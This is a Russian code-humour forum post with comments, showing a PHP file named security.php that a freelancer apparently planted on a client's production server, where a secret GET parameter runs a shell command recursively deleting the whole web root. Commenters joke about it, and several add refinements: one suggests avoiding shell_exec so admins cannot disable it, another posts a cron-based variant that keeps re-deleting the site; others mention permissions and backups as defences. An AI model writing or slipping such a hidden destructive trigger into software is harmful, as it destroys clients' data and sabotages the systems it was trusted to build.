1. PHP / Говнокод #12576

    +136

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    8. 8
    <?php
$param = $_GET['delaem'];
if($param=='nahui')
{
    $dir = __DIR__;
    shell_exec("rm -f -R ".$_SERVER['DOCUMENT_ROOT']);
}
?>

    Фрилансер защищает себя от неплатежеспособного заказчика xD

    Файл лежал на продакшин сервере около года, название файла - security.php

    Запостил: uint, 11 Февраля 2013

    Комментарии (9) RSS

    • ava nonamez 11.02.2013 23:39 # +11

      ок, пошел внедрять.
      Ответить

    • ava rdifb0 11.02.2013 23:46 # +5

      shell_exec не айс, админы любят такую лабуду отключать. opendir, readdir и понеслась.
      Ответить

    • ava bot 11.02.2013 23:52 # +1

      Отдаёт японским.
      Ответить

      • ava myaut 12.02.2013 09:28 # +4

        По-японски это так:
        if($param=='harakiri')
{
    //...
    echo 'Sakura blossoming';
}
        Ответить

    • ava Lure Of Chaos 12.02.2013 04:03 # +2

      по моему опыту, на "допилку" нанимается спустя приличный срок совершенно другой фрилансер, который по незнанию или умышленно уничтожает подобные триалки.
      что еще хуже, так это то, что существует значительная вероятность подбора параметров скрипт-кидди (многие мыслят одинаково)
      Ответить

    • ava eth0 12.02.2013 19:53 # 0

      Правильно выставить права и всё, что он сможет сделать - вздохнуть грустно и с недоумением.
      Ответить

      • ava Stallman 12.02.2013 20:31 # 0

        Более того, никто не запрещает делать бекапы, а так хоть в крон восстановление запихивай. Вот уж обрадуется автор, когда его сворованное творение само воскреснет через несколько минут.
        Ответить

        • ava nonamez 13.02.2013 09:57 # +2

          и опять исчезнет, и опять воскреснет, и опять исчезнет...
          Ответить

        • ava scriptin 13.02.2013 19:50 # +4 

          shell_exec('echo "rm -f -R ' . $_SERVER['DOCUMENT_ROOT'] . '" >> tmpcron && crontab tmpcron && rm -f tmpcron');
          Ответить

    Добавить комментарий